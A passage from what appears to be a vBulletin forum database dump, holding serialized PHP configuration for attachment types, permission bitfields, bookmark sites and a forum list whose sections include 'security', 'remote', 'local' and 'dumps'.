'a:12:{s:3:\"bmp\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"doc\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"gif\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"jpe\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:4:\"jpeg\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"jpg\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"pdf\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"png\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"psd\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"rar\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"txt\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"zip\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}}', 1), ('banemail', '', 0), ('bbcodecache', 'a:0:{}', 1), ('birthdaycache', 'a:4:{s:4:\"day1\";s:10:\"2016-08-12\";s:4:\"day2\";s:10:\"2016-08-13\";s:6:\"users1\";a:0:{}s:6:\"users2\";a:0:{}}', 1), ('bitfields', 'a:2:{s:3:\"ugp\";a:13:{s:16:\"forumpermissions\";a:24:{s:7:\"canview\";i:1;s:14:\"canviewthreads\";i:524288;s:13:\"canviewothers\";i:2;s:9:\"cansearch\";i:4;s:8:\"canemail\";i:8;s:10:\"canpostnew\";i:16;s:11:\"canreplyown\";i:32;s:14:\"canreplyothers\";i:64;s:11:\"caneditpost\";i:128;s:13:\"candeletepost\";i:256;s:15:\"candeletethread\";i:512;s:12:\"canopenclose\";i:1024;s:7:\"canmove\";i:2048;s:16:\"cangetattachment\";i:4096;s:17:\"canpostattachment\";i:8192;s:11:\"canpostpoll\";i:16384;s:7:\"canvote\";i:32768;s:13:\"canthreadrate\";i:65536;s:21:\"followforummoderation\";i:131072;s:15:\"canseedelnotice\";i:262144;s:9:\"cantagown\";i:1048576;s:12:\"cantagothers\";i:2097152;s:15:\"candeletetagown\";i:4194304;s:16:\"canseethumbnails\";i:8388608;}s:13:\"pmpermissions\";a:3:{s:10:\"cantrackpm\";i:1;s:17:\"candenypmreceipts\";i:2;s:14:\"canignorequota\";i:4;}s:19:\"calendarpermissions\";a:6:{s:15:\"canviewcalendar\";i:1;s:12:\"canpostevent\";i:2;s:12:\"caneditevent\";i:4;s:14:\"candeleteevent\";i:8;s:18:\"canviewothersevent\";i:16;s:14:\"isnotmoderated\";i:32;}s:14:\"wolpermissions\";a:5:{s:13:\"canwhosonline\";i:1;s:15:\"canwhosonlineip\";i:2;s:17:\"canwhosonlinefull\";i:4;s:16:\"canwhosonlinebad\";i:8;s:21:\"canwhosonlinelocation\";i:16;}s:16:\"adminpermissions\";a:18:{s:11:\"ismoderator\";i:1;s:15:\"cancontrolpanel\";i:2;s:16:\"canadminsettings\";i:4;s:14:\"canadminstyles\";i:8;s:17:\"canadminlanguages\";i:16;s:14:\"canadminforums\";i:32;s:15:\"canadminthreads\";i:64;s:17:\"canadmincalendars\";i:128;s:13:\"canadminusers\";i:256;s:19:\"canadminpermissions\";i:512;s:11:\"canadminfaq\";i:1024;s:14:\"canadminimages\";i:2048;s:15:\"canadminbbcodes\";i:4096;s:12:\"canadmincron\";i:8192;s:16:\"canadminmaintain\";i:16384;s:15:\"canadminplugins\";i:65536;s:15:\"canadminnotices\";i:131072;s:14:\"canadminmodlog\";i:262144;}s:18:\"genericpermissions\";a:31:{s:14:\"canviewmembers\";i:1;s:16:\"canmodifyprofile\";i:2;s:12:\"caninvisible\";i:4;s:22:\"canviewothersusernotes\";i:8;s:21:\"canmanageownusernotes\";i:16;s:12:\"canseehidden\";i:32;s:14:\"canbeusernoted\";i:64;s:13:\"canprofilepic\";i:128;s:20:\"cananimateprofilepic\";i:134217728;s:12:\"canuseavatar\";i:512;s:16:\"cananimateavatar\";i:67108864;s:15:\"canusesignature\";i:1024;s:17:\"canusecustomtitle\";i:2048;s:16:\"canseeprofilepic\";i:4096;s:19:\"canviewownusernotes\";i:8192;s:24:\"canmanageothersusernotes\";i:16384;s:19:\"canpostownusernotes\";i:32768;s:22:\"canpostothersusernotes\";i:65536;s:19:\"caneditownusernotes\";i:131072;s:24:\"canseehiddencustomfields\";i:262144;s:12:\"canseeownrep\";i:256;s:9:\"canuserep\";i:524288;s:10:\"canhiderep\";i:1048576;s:14:\"cannegativerep\";i:2097152;s:17:\"cangiveinfraction\";i:4194304;s:16:\"canseeinfraction\";i:8388608;s:20:\"cangivearbinfraction\";i:536870912;s:20:\"canreverseinfraction\";i:16777216;s:16:\"cansearchft_bool\";i:33554432;s:14:\"canemailmember\";i:268435456;s:12:\"cancreatetag\";i:1073741824;}s:19:\"genericpermissions2\";a:1:{s:13:\"canusefriends\";i:1;}s:16:\"albumpermissions\";a:8:{s:8:\"canalbum\";i:1;s:12:\"canviewalbum\";i:2;s:28:\"picturefollowforummoderation\";i:128;s:13:\"canpiccomment\";i:4;s:20:\"caneditownpiccomment\";i:8;s:22:\"candeleteownpiccomment\";i:16;s:19:\"canmanagepiccomment\";i:32;s:28:\"commentfollowforummoderation\";i:64;}s:18:\"usercsspermissions\";a:6:{s:17:\"caneditfontfamily\";i:1;s:15:\"caneditfontsize\";i:2;s:13:\"caneditcolors\";i:4;s:14:\"caneditbgimage\";i:8;s:14:\"caneditborders\";i:16;s:14:\"caneditprivacy\";i:32;}s:14:\"genericoptions\";a:7:{s:9:\"showgroup\";i:1;s:12:\"showbirthday\";i:2;s:14:\"showmemberlist\";i:4;s:12:\"showeditedby\";i:8;s:17:\"allowmembergroups\";i:16;s:16:\"isnotbannedgroup\";i:32;s:14:\"requirehvcheck\";i:64;}s:20:\"signaturepermissions\";a:17:{s:9:\"canbbcode\";i:131072;s:14:\"canbbcodebasic\";i:1;s:14:\"canbbcodecolor\";i:2;s:13:\"canbbcodesize\";i:4;s:13:\"canbbcodefont\";i:8;s:14:\"canbbcodealign\";i:16;s:13:\"canbbcodelist\";i:32;s:13:\"canbbcodelink\";i:64;s:13:\"canbbcodecode\";i:128;s:12:\"canbbcodephp\";i:256;s:13:\"canbbcodehtml\";i:512;s:14:\"canbbcodequote\";i:1024;s:8:\"allowimg\";i:2048;s:12:\"allowsmilies\";i:4096;s:9:\"allowhtml\";i:8192;s:9:\"cansigpic\";i:32768;s:16:\"cananimatesigpic\";i:65536;}s:25:\"visitormessagepermissions\";a:6:{s:20:\"canmessageownprofile\";i:1;s:23:\"canmessageothersprofile\";i:2;s:18:\"caneditownmessages\";i:4;s:20:\"candeleteownmessages\";i:8;s:19:\"canmanageownprofile\";i:32;s:21:\"followforummoderation\";i:16;}s:22:\"socialgrouppermissions\";a:16:{s:13:\"canjoingroups\";i:1;s:15:\"cancreategroups\";i:2;s:18:\"canmanageowngroups\";i:256;s:16:\"caneditowngroups\";i:4;s:18:\"candeleteowngroups\";i:8;s:13:\"canviewgroups\";i:16;s:14:\"canpostmessage\";i:512;s:20:\"canalwayspostmessage\";i:128;s:17:\"canmanagemessages\";i:32;s:19:\"cancreatediscussion\";i:1024;s:25:\"canalwayscreatediscussion\";i:2048;s:18:\"canlimitdiscussion\";i:4096;s:20:\"canmanagediscussions\";i:8192;s:21:\"followforummoderation\";i:64;s:18:\"canuploadgroupicon\";i:16384;s:19:\"cananimategroupicon\";i:32768;}}s:4:\"misc\";a:16:{s:8:\"intperms\";a:25:{s:11:\"attachlimit\";i:1;s:7:\"pmquota\";i:0;s:9:\"pmsendmax\";i:1;s:18:\"pmthrottlequantity\";i:1;s:18:\"profilepicmaxwidth\";i:1;s:19:\"profilepicmaxheight\";i:1;s:17:\"profilepicmaxsize\";i:1;s:14:\"avatarmaxwidth\";i:1;s:15:\"avatarmaxheight\";i:1;s:13:\"avatarmaxsize\";i:1;s:16:\"albumpicmaxwidth\";i:1;s:17:\"albumpicmaxheight\";i:1;s:15:\"albumpicmaxsize\";i:1;s:12:\"albummaxpics\";i:1;s:12:\"albummaxsize\";i:1;s:14:\"sigmaxrawchars\";i:1;s:11:\"sigmaxchars\";i:1;s:11:\"sigmaxlines\";i:1;s:16:\"sigmaxsizebbcode\";i:1;s:12:\"sigmaximages\";i:1;s:14:\"sigpicmaxwidth\";i:1;s:15:\"sigpicmaxheight\";i:1;s:13:\"sigpicmaxsize\";i:1;s:19:\"maximumsocialgroups\";i:1;s:16:\"groupiconmaxsize\";i:1;}s:13:\"bbcodeoptions\";a:5:{s:11:\"strip_empty\";i:1;s:10:\"stop_parse\";i:2;s:15:\"disable_smilies\";i:4;s:16:\"disable_wordwrap\";i:8;s:21:\"disable_urlconversion\";i:16;}s:23:\"calmoderatorpermissions\";a:5:{s:13:\"caneditevents\";i:1;s:15:\"candeleteevents\";i:2;s:17:\"canmoderateevents\";i:4;s:10:\"canviewips\";i:8;s:13:\"canmoveevents\";i:16;}s:20:\"moderatorpermissions\";a:23:{s:12:\"caneditposts\";i:1;s:14:\"candeleteposts\";i:2;s:12:\"canopenclose\";i:4;s:14:\"caneditthreads\";i:8;s:16:\"canmanagethreads\";i:16;s:11:\"canannounce\";i:32;s:16:\"canmoderateposts\";i:64;s:22:\"canmoderateattachments\";i:128;s:11:\"canmassmove\";i:256;s:12:\"canmassprune\";i:512;s:10:\"canviewips\";i:1024;s:14:\"canviewprofile\";i:2048;s:11:\"canbanusers\";i:4096;s:13:\"canunbanusers\";i:8192;s:14:\"newthreademail\";i:16384;s:12:\"newpostemail\";i:32768;s:14:\"cansetpassword\";i:65536;s:14:\"canremoveposts\";i:131072;s:11:\"caneditsigs\";i:262144;s:13:\"caneditavatar\";i:524288;s:11:\"caneditpoll\";i:1048576;s:17:\"caneditprofilepic\";i:2097152;s:17:\"caneditreputation\";i:4194304;}s:21:\"moderatorpermissions2\";a:22:{s:22:\"caneditvisitormessages\";i:1;s:24:\"candeletevisitormessages\";i:2;s:24:\"canremovevisitormessages\";i:4;s:26:\"canmoderatevisitormessages\";i:8;s:19:\"caneditalbumpicture\";i:16;s:21:\"candeletealbumpicture\";i:32;s:19:\"caneditsocialgroups\";i:64;s:21:\"candeletesocialgroups\";i:128;s:20:\"caneditgroupmessages\";i:256;s:22:\"candeletegroupmessages\";i:512;s:22:\"canremovegroupmessages\";i:1024;s:24:\"canmoderategroupmessages\";i:2048;s:26:\"canmoderatepicturecomments\";i:4096;s:24:\"candeletepicturecomments\";i:8192;s:24:\"canremovepicturecomments\";i:16384;s:22:\"caneditpicturecomments\";i:32768;s:19:\"canmoderatepictures\";i:65536;s:18:\"caneditdiscussions\";i:131072;s:20:\"candeletediscussions\";i:262144;s:20:\"canremovediscussions\";i:524288;s:22:\"canmoderatediscussions\";i:1048576;s:23:\"cantransfersocialgroups\";i:2097152;}s:15:\"languageoptions\";a:2:{s:9:\"direction\";i:1;s:7:\"dirmark\";i:2;}s:12:\"adminoptions\";a:2:{s:11:\"adminavatar\";i:1;s:15:\"adminprofilepic\";i:2;}s:11:\"useroptions\";a:23:{s:14:\"showsignatures\";i:1;s:11:\"showavatars\";i:2;s:10:\"showimages\";i:4;s:9:\"coppauser\";i:8;s:10:\"adminemail\";i:16;s:9:\"showvcard\";i:32;s:7:\"dstauto\";i:64;s:8:\"dstonoff\";i:128;s:9:\"showemail\";i:256;s:9:\"invisible\";i:512;s:14:\"showreputation\";i:1024;s:9:\"receivepm\";i:2048;s:9:\"emailonpm\";i:4096;s:13:\"hasaccessmask\";i:8192;s:9:\"postorder\";i:32768;s:16:\"receivepmbuddies\";i:131072;s:17:\"noactivationmails\";i:262144;s:12:\"pmboxwarning\";i:524288;s:11:\"showusercss\";i:1048576;s:25:\"receivefriendemailrequest\";i:2097152;s:9:\"vm_enable\";i:8388608;s:14:\"vm_contactonly\";i:16777216;s:17:\"pmdefaultsavecopy\";i:33554432;}s:12:\"forumoptions\";a:18:{s:6:\"active\";i:1;s:12:\"allowposting\";i:2;s:17:\"cancontainthreads\";i:4;s:15:\"moderatenewpost\";i:8;s:17:\"moderatenewthread\";i:16;s:14:\"moderateattach\";i:32;s:11:\"allowbbcode\";i:64;s:11:\"allowimages\";i:128;s:9:\"allowhtml\";i:256;s:12:\"allowsmilies\";i:512;s:10:\"allowicons\";i:1024;s:12:\"allowratings\";i:2048;s:10:\"countposts\";i:4096;s:15:\"canhavepassword\";i:8192;s:10:\"indexposts\";i:16384;s:13:\"styleoverride\";i:32768;s:15:\"showonforumjump\";i:65536;s:14:\"prefixrequired\";i:131072;}s:10:\"regoptions\";a:26:{s:10:\"adminemail\";i:1;s:13:\"invisiblemode\";i:2;s:12:\"receiveemail\";i:4;s:8:\"enablepm\";i:8;s:9:\"emailonpm\";i:16;s:7:\"pmpopup\";i:32;s:11:\"vbcode_none\";i:64;s:15:\"vbcode_standard\";i:128;s:15:\"vbcode_enhanced\";i:256;s:14:\"subscribe_none\";i:512;s:18:\"subscribe_nonotify\";i:1024;s:17:\"subscribe_instant\";i:2048;s:15:\"subscribe_daily\";i:4096;s:16:\"subscribe_weekly\";i:8192;s:5:\"vcard\";i:16384;s:9:\"signature\";i:32768;s:6:\"avatar\";i:65536;s:5:\"image\";i:131072;s:20:\"thread_linear_oldest\";i:262144;s:20:\"thread_linear_newest\";i:524288;s:15:\"thread_threaded\";i:1048576;s:13:\"thread_hybrid\";i:2097152;s:14:\"showreputation\";i:4194304;s:9:\"vm_enable\";i:8388608;s:14:\"vm_contactonly\";i:16777216;s:17:\"pmdefaultsavecopy\";i:33554432;}s:19:\"announcementoptions\";a:5:{s:11:\"allowbbcode\";i:1;s:9:\"allowhtml\";i:2;s:12:\"allowsmilies\";i:4;s:8:\"parseurl\";i:8;s:9:\"signature\";i:16;}s:11:\"feedoptions\";a:11:{s:7:\"enabled\";i:1;s:10:\"searchboth\";i:2;s:11:\"stickthread\";i:8;s:13:\"unstickthread\";i:16;s:11:\"closethread\";i:32;s:12:\"allowsmilies\";i:64;s:13:\"showsignature\";i:128;s:9:\"allowhtml\";i:256;s:14:\"moderatethread\";i:512;s:11:\"html2bbcode\";i:1024;s:8:\"matchall\";i:2048;}s:6:\"socnet\";a:6:{s:13:\"enable_groups\";i:1;s:13:\"enable_albums\";i:2;s:14:\"enable_friends\";i:4;s:23:\"enable_visitor_tracking\";i:8;s:24:\"enable_visitor_messaging\";i:16;s:22:\"enable_profile_styling\";i:32;}s:18:\"socialgroupoptions\";a:5:{s:15:\"owner_mod_queue\";i:1;s:12:\"join_to_view\";i:2;s:21:\"enable_group_messages\";i:4;s:19:\"enable_group_albums\";i:8;s:22:\"only_owner_discussions\";i:16;}s:13:\"prefixoptions\";a:1:{s:15:\"deny_by_default\";i:1;}s:7:\"hvcheck\";a:5:{s:8:\"register\";i:1;s:4:\"post\";i:2;s:6:\"search\";i:4;s:9:\"contactus\";i:8;s:6:\"lostpw\";i:16;}}}', 1), ('bookmarksitecache', 'a:4:{i:1;a:7:{s:14:\"bookmarksiteid\";s:1:\"1\";s:5:\"title\";s:4:\"Digg\";s:8:\"iconpath\";s:21:\"bookmarksite_digg.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"10\";s:3:\"url\";s:62:\"http://digg.com/submit?phase=2&url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:2;a:7:{s:14:\"bookmarksiteid\";s:1:\"2\";s:5:\"title\";s:11:\"del.icio.us\";s:8:\"iconpath\";s:26:\"bookmarksite_delicious.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"20\";s:3:\"url\";s:51:\"http://del.icio.us/post?url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:3;a:7:{s:14:\"bookmarksiteid\";s:1:\"3\";s:5:\"title\";s:11:\"StumbleUpon\";s:8:\"iconpath\";s:28:\"bookmarksite_stumbleupon.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"30\";s:3:\"url\";s:61:\"http://www.stumbleupon.com/submit?url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:4;a:7:{s:14:\"bookmarksiteid\";s:1:\"4\";s:5:\"title\";s:6:\"Google\";s:8:\"iconpath\";s:23:\"bookmarksite_google.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"40\";s:3:\"url\";s:94:\"http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}}', 1), ('cron', '1465232700', 0), ('eventcache', 'a:1:{s:4:\"date\";s:9:\"8-14-2016\";}', 1), ('forumcache', 'a:22:{i:1;a:24:{s:7:\"forumid\";i:1;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"invites\";s:11:\"title_clean\";s:7:\"invites\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:4:\"1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:8:\"1,2,4,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:2;a:24:{s:7:\"forumid\";i:2;s:7:\"styleid\";i:0;s:5:\"title\";s:3:\"new\";s:11:\"title_clean\";s:3:\"new\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:89799;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:2862;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:1;s:10:\"parentlist\";s:6:\"2,1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"2,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:4;a:24:{s:7:\"forumid\";i:4;s:7:\"styleid\";i:0;s:5:\"title\";s:9:\"activated\";s:11:\"title_clean\";s:9:\"activated\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:3;s:10:\"lastpostid\";i:2285;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:1;s:10:\"parentlist\";s:6:\"4,1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"4,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:11;a:24:{s:7:\"forumid\";i:11;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"project\";s:11:\"title_clean\";s:7:\"project\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"11,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:8:\"11,13,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:13;a:24:{s:7:\"forumid\";i:13;s:7:\"styleid\";i:0;s:5:\"title\";s:4:\"news\";s:11:\"title_clean\";s:4:\"news\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:13;s:10:\"lastpostid\";i:2931;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:11;s:10:\"parentlist\";s:8:\"13,11,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"13,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:0;i:2;i:16777215;i:5;i:0;i:1;i:0;i:3;i:0;}}i:6;a:24:{s:7:\"forumid\";i:6;s:7:\"styleid\";i:0;s:5:\"title\";s:8:\"security\";s:11:\"title_clean\";s:8:\"security\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97987;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:4;s:10:\"lastpostid\";i:1014;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:4:\"6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"6,7,9,10,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:7;a:24:{s:7:\"forumid\";i:7;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"remote\";s:11:\"title_clean\";s:6:\"remote\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:5;s:10:\"lastpostid\";i:2990;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:6:\"7,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"7,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:9;a:24:{s:7:\"forumid\";i:9;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"local\";s:11:\"title_clean\";s:5:\"local\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:6;s:10:\"lastpostid\";i:2210;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:6:\"9,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"9,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:10;a:24:{s:7:\"forumid\";i:10;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"dumps\";s:11:\"title_clean\";s:5:\"dumps\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:7;s:10:\"lastpostid\";i:2932;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:7:\"10,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"10,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:14;a:24:{s:7:\"forumid\";i:14;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"coding\";s:11:\"title_clean\";s:6:\"coding\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:8;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"14,16,15,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:16;a:24:{s:7:\"forumid\";i:16;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"develop\";s:11:\"title_clean\";s:7:\"develop\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:9;s:10:\"lastpostid\";i:2979;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:14;s:10:\"parentlist\";s:8:\"16,14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"16,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;